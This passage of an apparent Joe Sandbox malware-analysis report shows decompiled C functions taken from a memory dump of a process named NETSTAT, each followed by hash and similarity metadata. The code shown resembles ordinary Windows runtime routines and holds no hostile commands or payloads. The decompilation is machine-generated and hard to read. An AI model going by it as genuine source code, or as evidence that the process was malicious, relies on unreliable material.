                                      				intOrPtr _t90;
                                      				intOrPtr _t92;
                                      				signed int _t97;
                                      				intOrPtr _t98;
                                      				intOrPtr* _t99;
                                      				signed int* _t101;
                                      				signed int* _t102;
                                      				intOrPtr* _t103;
                                      				intOrPtr _t105;
                                      				signed int _t106;
                                      				void* _t118;
                                      
                                      				_t92 = __edx;
                                      				_t75 = _a4;
                                      				_t98 = __ecx;
                                      				_v44 = __edx;
                                      				_t106 = _t75[1];
                                      				_v40 = __ecx;
                                      				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                      					_t82 = 0;
                                      				} else {
                                      					_t82 = 1;
                                      				}
                                      				_v5 = _t82;
                                      				_t6 = _t98 + 0xc8; // 0xc9
                                      				_t101 = _t6;
                                      				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                      				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                      				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                      				if(_t82 != 0) {
                                      					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                      					_t83 =  *_t75;
                                      					_t54 = _t75[1];
                                      					 *_t101 = _t83;
                                      					_t84 = _t83 | _t54;
                                      					_t101[1] = _t54;
                                      					if(_t84 == 0) {
                                      						_t101[1] = _t101[1] & _t84;
                                      						 *_t101 = 1;
                                      					}
                                      					goto L19;
                                      				} else {
                                      					if(_t101 == 0) {
                                      						E02E6CC50(E02E64510(0xc000000d));
                                      						_t88 =  *_t101;
                                      						_t97 = _t101[1];
                                      						L15:
                                      						_v12 = _t88;
                                      						_t66 = _t88 -  *_t75;
                                      						_t89 = _t97;
                                      						asm("sbb ecx, [ebx+0x4]");
                                      						_t118 = _t89 - _t97;
                                      						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                      							_t66 = _t66 | 0xffffffff;
                                      							_t89 = 0x7fffffff;
                                      						}
                                      						 *_t101 = _t66;
                                      						_t101[1] = _t89;
                                      						L19:
                                      						if(E02E87D50() != 0) {
                                      							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      						} else {
                                      							_t58 = 0x7ffe0386;
                                      						}
                                      						_t102 = _v16;
                                      						if( *_t58 != 0) {
                                      							_t58 = E02F38ED6(_t102, _t98);
                                      						}
                                      						_t76 = _v44;
                                      						E02E82280(_t58, _v44);
                                      						E02E8DD82(_v44, _t102, _t98);
                                      						E02E8B944(_t102, _v5);
                                      						return E02E7FFB0(_t76, _t98, _t76);
                                      					}
                                      					_t99 = 0x7ffe03b0;
                                      					do {
                                      						_t103 = 0x7ffe0010;
                                      						do {
                                      							_t67 =  *0x2f58628; // 0x0
                                      							_v28 = _t67;
                                      							_t68 =  *0x2f5862c; // 0x0
                                      							_v32 = _t68;
                                      							_v24 =  *((intOrPtr*)(_t99 + 4));
                                      							_v20 =  *_t99;
                                      							while(1) {
                                      								_t97 =  *0x7ffe000c;
                                      								_t90 =  *0x7FFE0008;
                                      								if(_t97 ==  *_t103) {
                                      									goto L10;
                                      								}
                                      								asm("pause");
                                      							}
                                      							L10:
                                      							_t79 = _v24;
                                      							_t99 = 0x7ffe03b0;
                                      							_v12 =  *0x7ffe03b0;
                                      							_t72 =  *0x7FFE03B4;
                                      							_t103 = 0x7ffe0010;
                                      							_v36 = _t72;
                                      						} while (_v20 != _v12 || _t79 != _t72);
                                      						_t73 =  *0x2f58628; // 0x0
                                      						_t105 = _v28;
                                      						_t80 =  *0x2f5862c; // 0x0
                                      					} while (_t105 != _t73 || _v32 != _t80);
                                      					_t98 = _v40;
                                      					asm("sbb edx, [ebp-0x20]");
                                      					_t88 = _t90 - _v12 - _t105;
                                      					_t75 = _a4;
                                      					asm("sbb edx, eax");
                                      					_t31 = _t98 + 0xc8; // 0x2f2fb53
                                      					_t101 = _t31;
                                      					 *_t101 = _t88;
                                      					_t101[1] = _t97;
                                      					goto L15;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a2349ed6facf8a1fcd83442f96970c9c7ded66efba5febf7efd5e2656dddade
                                      • Instruction ID: 06882a0afe1fa0111811ed8dcdcc73bbd371f2412083476e1950b49ba23c7eb6
                                      • Opcode Fuzzy Hash: 7a2349ed6facf8a1fcd83442f96970c9c7ded66efba5febf7efd5e2656dddade
                                      • Instruction Fuzzy Hash: 82518F71A40615CFCB14EFB8C89069DF7F1BB49354F209659D59DA7380EB30A944CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E02E7EF40(intOrPtr __ecx) {
                                      				char _v5;
                                      				char _v6;
                                      				char _v7;
                                      				char _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr _t58;
                                      				char _t59;
                                      				signed char _t69;
                                      				void* _t73;
                                      				signed int _t74;
                                      				char _t79;
                                      				signed char _t81;
                                      				signed int _t85;
                                      				signed int _t87;
                                      				intOrPtr _t90;
                                      				signed char* _t91;
                                      				void* _t92;
                                      				signed int _t94;
                                      				void* _t96;
                                      
                                      				_t90 = __ecx;
                                      				_v16 = __ecx;
                                      				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                      					_t58 =  *((intOrPtr*)(__ecx));
                                      					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                      						E02E69080(_t73, __ecx, __ecx, _t92);
                                      					}
                                      				}
                                      				_t74 = 0;
                                      				_t96 =  *0x7ffe036a - 1;
                                      				_v12 = 0;
                                      				_v7 = 0;
                                      				if(_t96 > 0) {
                                      					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                      					_v12 = _t74;
                                      					_v7 = _t96 != 0;
                                      				}
                                      				_t79 = 0;
                                      				_v8 = 0;
                                      				_v5 = 0;
                                      				while(1) {
                                      					L4:
                                      					_t59 = 1;
                                      					L5:
                                      					while(1) {
                                      						if(_t59 == 0) {
                                      							L12:
                                      							_t21 = _t90 + 4; // 0x775ec21e
                                      							_t87 =  *_t21;
                                      							_v6 = 0;
                                      							if(_t79 != 0) {
                                      								if((_t87 & 0x00000002) != 0) {
                                      									goto L19;
                                      								}
                                      								if((_t87 & 0x00000001) != 0) {
                                      									_v6 = 1;
                                      									_t74 = _t87 ^ 0x00000003;
                                      								} else {
                                      									_t51 = _t87 - 2; // -2
                                      									_t74 = _t51;
                                      								}
                                      								goto L15;
                                      							} else {
                                      								if((_t87 & 0x00000001) != 0) {
                                      									_v6 = 1;
                                      									_t74 = _t87 ^ 0x00000001;
                                      								} else {
                                      									_t26 = _t87 - 4; // -4
                                      									_t74 = _t26;
                                      									if((_t74 & 0x00000002) == 0) {
                                      										_t74 = _t74 - 2;
                                      									}
                                      								}
                                      								L15:
                                      								if(_t74 == _t87) {
                                      									L19:
                                      									E02E62D8A(_t74, _t90, _t87, _t90);
                                      									_t74 = _v12;
                                      									_v8 = 1;
                                      									if(_v7 != 0 && _t74 > 0x64) {
                                      										_t74 = _t74 - 1;
                                      										_v12 = _t74;
                                      									}
                                      									_t79 = _v5;
                                      									goto L4;
                                      								}
                                      								asm("lock cmpxchg [esi], ecx");
                                      								if(_t87 != _t87) {
                                      									_t74 = _v12;
                                      									_t59 = 0;
                                      									_t79 = _v5;
                                      									continue;
                                      								}
                                      								if(_v6 != 0) {
                                      									_t74 = _v12;
                                      									L25:
                                      									if(_v7 != 0) {
                                      										if(_t74 < 0x7d0) {
                                      											if(_v8 == 0) {
                                      												_t74 = _t74 + 1;
                                      											}
                                      										}
                                      										_t38 = _t90 + 0x14; // 0x0
                                      										_t39 = _t90 + 0x14; // 0x0
                                      										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                      										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                      											_t85 = _t85 & 0xff000000;
                                      										}
                                      										 *(_t90 + 0x14) = _t85;
                                      									}
                                      									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                      									 *((intOrPtr*)(_t90 + 8)) = 1;
                                      									return 0;
                                      								}
                                      								_v5 = 1;
                                      								_t87 = _t74;
                                      								goto L19;
                                      							}
                                      						}
                                      						_t94 = _t74;
                                      						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                      						if(_t74 == 0) {
                                      							goto L12;
                                      						} else {
                                      							_t91 = _t90 + 4;
                                      							goto L8;
                                      							L9:
                                      							while((_t81 & 0x00000001) != 0) {
                                      								_t69 = _t81;
                                      								asm("lock cmpxchg [edi], edx");
                                      								if(_t69 != _t81) {
                                      									_t81 = _t69;
                                      									continue;
                                      								}
                                      								_t90 = _v16;
                                      								goto L25;
                                      							}
                                      							asm("pause");
                                      							_t94 = _t94 - 1;
                                      							if(_t94 != 0) {
                                      								L8:
                                      								_t81 =  *_t91;
                                      								goto L9;
                                      							} else {
                                      								_t90 = _v16;
                                      								_t79 = _v5;
                                      								goto L12;
                                      							}
                                      						}
                                      					}
                                      				}
                                      			}





























                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                      • Instruction ID: b72f74abf0a546d9403b5bd561db1cdd407a179b45212bed572ca789992036ba
                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                      • Instruction Fuzzy Hash: 73512430E84249DFDB24CB69C1D07EEBBB2AF1531CF28E1A8D45593B81C375A989C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E02F3740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                      				signed short* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _t55;
                                      				void* _t56;
                                      				intOrPtr* _t66;
                                      				intOrPtr* _t69;
                                      				void* _t74;
                                      				intOrPtr* _t78;
                                      				intOrPtr* _t81;
                                      				intOrPtr* _t82;
                                      				intOrPtr _t83;
                                      				signed short* _t84;
                                      				intOrPtr _t85;
                                      				signed int _t87;
                                      				intOrPtr* _t90;
                                      				intOrPtr* _t93;
                                      				intOrPtr* _t94;
                                      				void* _t98;
                                      
                                      				_t84 = __edx;
                                      				_t80 = __ecx;
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t55 = __ecx;
                                      				_v8 = __edx;
                                      				_t87 =  *__edx & 0x0000ffff;
                                      				_v12 = __ecx;
                                      				_t3 = _t55 + 0x154; // 0x154
                                      				_t93 = _t3;
                                      				_t78 =  *_t93;
                                      				_t4 = _t87 + 2; // 0x2
                                      				_t56 = _t4;
                                      				while(_t78 != _t93) {
                                      					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                      						L4:
                                      						_t78 =  *_t78;
                                      						continue;
                                      					} else {
                                      						_t7 = _t78 + 0x18; // 0x18
                                      						if(E02EBD4F0(_t7, _t84[2], _t87) == _t87) {
                                      							_t40 = _t78 + 0xc; // 0xc
                                      							_t94 = _t40;
                                      							_t90 =  *_t94;
                                      							while(_t90 != _t94) {
                                      								_t41 = _t90 + 8; // 0x8
                                      								_t74 = E02EAF380(_a4, _t41, 0x10);
                                      								_t98 = _t98 + 0xc;
                                      								if(_t74 != 0) {
                                      									_t90 =  *_t90;
                                      									continue;
                                      								}
                                      								goto L12;
                                      							}
                                      							_t82 = L02E84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                      							if(_t82 != 0) {
                                      								_t46 = _t78 + 0xc; // 0xc
                                      								_t69 = _t46;
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								_t85 =  *_t69;
                                      								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                      									L20:
                                      									_t82 = 3;
                                      									asm("int 0x29");
                                      								}
                                      								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                      								 *_t82 = _t85;
                                      								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                      								 *_t69 = _t82;
                                      								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                      								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                      								goto L11;
                                      							} else {
                                      								L18:
                                      								_push(0xe);
                                      								_pop(0);
                                      							}
                                      						} else {
                                      							_t84 = _v8;
                                      							_t9 = _t87 + 2; // 0x2
                                      							_t56 = _t9;
                                      							goto L4;
                                      						}
                                      					}
                                      					L12:
                                      					return 0;
                                      				}
                                      				_t10 = _t87 + 0x1a; // 0x1a
                                      				_t78 = L02E84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                      				if(_t78 == 0) {
                                      					goto L18;
                                      				} else {
                                      					_t12 = _t87 + 2; // 0x2
                                      					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                      					_t16 = _t78 + 0x18; // 0x18
                                      					E02EAF3E0(_t16, _v8[2], _t87);
                                      					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                      					_t19 = _t78 + 0xc; // 0xc
                                      					_t66 = _t19;
                                      					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                      					 *_t66 = _t66;
                                      					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                      					_t81 = L02E84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                      					if(_t81 == 0) {
                                      						goto L18;
                                      					} else {
                                      						_t26 = _t78 + 0xc; // 0xc
                                      						_t69 = _t26;
                                      						asm("movsd");
                                      						asm("movsd");
                                      						asm("movsd");
                                      						asm("movsd");
                                      						_t85 =  *_t69;
                                      						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                      							goto L20;
                                      						} else {
                                      							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                      							 *_t81 = _t85;
                                      							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                      							 *_t69 = _t81;
                                      							_t83 = _v12;
                                      							 *(_t78 + 8) = 1;
                                      							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                      							_t34 = _t83 + 0x154; // 0x1ba
                                      							_t69 = _t34;
                                      							_t85 =  *_t69;
                                      							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                      								goto L20;
                                      							} else {
                                      								 *_t78 = _t85;
                                      								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                      								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                      								 *_t69 = _t78;
                                      								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                      							}
                                      						}
                                      						goto L11;
                                      					}
                                      				}
                                      				goto L12;
                                      			}





















                                      0x02f37505
                                      0x02f374f9
                                      0x00000000
                                      0x02f374cd
                                      0x02f374b5
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction ID: 09560d38e292a5256d9ae3acc7509edde7a0242832fda7bcd4b32e6b07dce6a3
                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction Fuzzy Hash: 47517CB2A40606EFCB1ADF14C580A96FBB5FF45344F14C0AAEA089F251E371E946CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E02E92990() {
                                      				signed int* _t62;
                                      				signed int _t64;
                                      				intOrPtr _t66;
                                      				signed short* _t69;
                                      				intOrPtr _t76;
                                      				signed short* _t79;
                                      				void* _t81;
                                      				signed int _t82;
                                      				signed short* _t83;
                                      				signed int _t87;
                                      				intOrPtr _t91;
                                      				void* _t98;
                                      				signed int _t99;
                                      				void* _t101;
                                      				signed int* _t102;
                                      				void* _t103;
                                      				void* _t104;
                                      				void* _t107;
                                      
                                      				_push(0x20);
                                      				_push(0x2f3ff00);
                                      				E02EBD08C(_t81, _t98, _t101);
                                      				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                      				_t99 = 0;
                                      				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                      				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                      				if(_t82 == 0) {
                                      					_t62 = 0xc0000100;
                                      				} else {
                                      					 *((intOrPtr*)(_t103 - 4)) = 0;
                                      					_t102 = 0xc0000100;
                                      					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                      					_t64 = 4;
                                      					while(1) {
                                      						 *(_t103 - 0x24) = _t64;
                                      						if(_t64 == 0) {
                                      							break;
                                      						}
                                      						_t87 = _t64 * 0xc;
                                      						 *(_t103 - 0x2c) = _t87;
                                      						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2e41664));
                                      						if(_t107 <= 0) {
                                      							if(_t107 == 0) {
                                      								_t79 = E02EAE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2e41668)), _t82);
                                      								_t104 = _t104 + 0xc;
                                      								__eflags = _t79;
                                      								if(__eflags == 0) {
                                      									_t102 = E02EE51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2e4166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                      									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                      									break;
                                      								} else {
                                      									_t64 =  *(_t103 - 0x24);
                                      									goto L5;
                                      								}
                                      								goto L13;
                                      							} else {
                                      								L5:
                                      								_t64 = _t64 - 1;
                                      								continue;
                                      							}
                                      						}
                                      						break;
                                      					}
                                      					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                      					__eflags = _t102;
                                      					if(_t102 < 0) {
                                      						__eflags = _t102 - 0xc0000100;
                                      						if(_t102 == 0xc0000100) {
                                      							_t83 =  *((intOrPtr*)(_t103 + 8));
                                      							__eflags = _t83;
                                      							if(_t83 != 0) {
                                      								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                      								__eflags =  *_t83 - _t99;
                                      								if( *_t83 == _t99) {
                                      									_t102 = 0xc0000100;
                                      									goto L19;
                                      								} else {
                                      									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                      									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                      									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                      									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                      										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                      										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                      											L26:
                                      											_t102 = E02E92AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                      											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                      											__eflags = _t102 - 0xc0000100;
                                      											if(_t102 != 0xc0000100) {
                                      												goto L12;
                                      											} else {
                                      												_t99 = 1;
                                      												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                      												goto L18;
                                      											}
                                      										} else {
                                      											_t69 = E02E76600( *((intOrPtr*)(_t91 + 0x1c)));
                                      											__eflags = _t69;
                                      											if(_t69 != 0) {
                                      												goto L26;
                                      											} else {
                                      												_t83 =  *((intOrPtr*)(_t103 + 8));
                                      												goto L18;
                                      											}
                                      										}
                                      									} else {
                                      										L18:
                                      										_t102 = E02E92C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                      										L19:
                                      										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                      										goto L12;
                                      									}
                                      								}
                                      								L28:
                                      							} else {
                                      								E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      								 *((intOrPtr*)(_t103 - 4)) = 1;
                                      								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                      								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                      								_t76 = E02E92AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                      								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                      								__eflags = _t76 - 0xc0000100;
                                      								if(_t76 == 0xc0000100) {
                                      									 *((intOrPtr*)(_t103 - 0x1c)) = E02E92C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                      								}
                                      								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                      								E02E92ACB();
                                      							}
                                      						}
                                      					}
                                      					L12:
                                      					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                      					_t62 = _t102;
                                      				}
                                      				L13:
                                      				return E02EBD0D1(_t62);
                                      				goto L28;
                                      			}






















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8cc8e20665d3b42a794148300ea02ab40930a1cc48054296982b8b2739df86a9
                                      • Instruction ID: 732dfc026e61246759de3d589f9a07c5d0d515a106d63cd33ea3f12072467e38
                                      • Opcode Fuzzy Hash: 8cc8e20665d3b42a794148300ea02ab40930a1cc48054296982b8b2739df86a9
                                      • Instruction Fuzzy Hash: 78514772980209EFDF25DF54C880ADEBBB6BF48318F05D056EE04AB260C3759952CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E02E94BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                      				signed int _v8;
                                      				short _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v156;
                                      				short _v158;
                                      				intOrPtr _v160;
                                      				char _v164;
                                      				intOrPtr _v168;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t45;
                                      				intOrPtr _t74;
                                      				signed char _t77;
                                      				intOrPtr _t84;
                                      				char* _t85;
                                      				void* _t86;
                                      				intOrPtr _t87;
                                      				signed short _t88;
                                      				signed int _t89;
                                      
                                      				_t83 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t89;
                                      				_t45 = _a8 & 0x0000ffff;
                                      				_v158 = __edx;
                                      				_v168 = __ecx;
                                      				if(_t45 == 0) {
                                      					L22:
                                      					_t86 = 6;
                                      					L12:
                                      					E02E6CC50(_t86);
                                      					L11:
                                      					return E02EAB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                      				}
                                      				_t77 = _a4;
                                      				if((_t77 & 0x00000001) != 0) {
                                      					goto L22;
                                      				}
                                      				_t8 = _t77 + 0x34; // 0xdce0ba00
                                      				if(_t45 !=  *_t8) {
                                      					goto L22;
                                      				}
                                      				_t9 = _t77 + 0x24; // 0x2f58504
                                      				E02E82280(_t9, _t9);
                                      				_t87 = 0x78;
                                      				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                      				E02EAFA60( &_v156, 0, _t87);
                                      				_t13 = _t77 + 0x30; // 0x3db8
                                      				_t85 =  &_v156;
                                      				_v36 =  *_t13;
                                      				_v28 = _v168;
                                      				_v32 = 0;
                                      				_v24 = 0;
                                      				_v20 = _v158;
                                      				_v160 = 0;
                                      				while(1) {
                                      					_push( &_v164);
                                      					_push(_t87);
                                      					_push(_t85);
                                      					_push(0x18);
                                      					_push( &_v36);
                                      					_push(0x1e);
                                      					_t88 = E02EAB0B0();
                                      					if(_t88 != 0xc0000023) {
                                      						break;
                                      					}
                                      					if(_t85 !=  &_v156) {
                                      						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                      					}
                                      					_t84 = L02E84620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                      					_v168 = _v164;
                                      					if(_t84 == 0) {
                                      						_t88 = 0xc0000017;
                                      						goto L19;
                                      					} else {
                                      						_t74 = _v160 + 1;
                                      						_v160 = _t74;
                                      						if(_t74 >= 0x10) {
                                      							L19:
                                      							_t86 = E02E6CCC0(_t88);
                                      							if(_t86 != 0) {
                                      								L8:
                                      								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                      								_t30 = _t77 + 0x24; // 0x2f58504
                                      								E02E7FFB0(_t77, _t84, _t30);
                                      								if(_t84 != 0 && _t84 !=  &_v156) {
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                      								}
                                      								if(_t86 != 0) {
                                      									goto L12;
                                      								} else {
                                      									goto L11;
                                      								}
                                      							}
                                      							L6:
                                      							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                      							if(_v164 != 0) {
                                      								_t83 = _t84;
                                      								E02E94F49(_t77, _t84);
                                      							}
                                      							goto L8;
                                      						}
                                      						_t87 = _v168;
                                      						continue;
                                      					}
                                      				}
                                      				if(_t88 != 0) {
                                      					goto L19;
                                      				}
                                      				goto L6;
                                      			}



























                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f7a8f348a750660ada9131bf73b8c3d777e203989db938b17c60febee3cb4c98
                                      • Instruction ID: 1940cc87f66157f8cff41411ec6632ca8a0f07589fae9130c7799faff5606c49
                                      • Opcode Fuzzy Hash: f7a8f348a750660ada9131bf73b8c3d777e203989db938b17c60febee3cb4c98
                                      • Instruction Fuzzy Hash: 2C41A135A8022C9FDF20DF64C940BEA77B9EF45704F0190A6E908AB240DB349E81CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E02E94D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                      				signed int _v12;
                                      				char _v176;
                                      				char _v177;
                                      				char _v184;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed short _t42;
                                      				char* _t44;
                                      				intOrPtr _t46;
                                      				intOrPtr _t50;
                                      				char* _t57;
                                      				intOrPtr _t59;
                                      				intOrPtr _t67;
                                      				signed int _t69;
                                      
                                      				_t64 = __edx;
                                      				_v12 =  *0x2f5d360 ^ _t69;
                                      				_t65 = 0xa0;
                                      				_v196 = __edx;
                                      				_v177 = 0;
                                      				_t67 = __ecx;
                                      				_v192 = __ecx;
                                      				E02EAFA60( &_v176, 0, 0xa0);
                                      				_t57 =  &_v176;
                                      				_t59 = 0xa0;
                                      				if( *0x2f57bc8 != 0) {
                                      					L3:
                                      					while(1) {
                                      						asm("movsd");
                                      						asm("movsd");
                                      						asm("movsd");
                                      						asm("movsd");
                                      						_t67 = _v192;
                                      						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                      						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
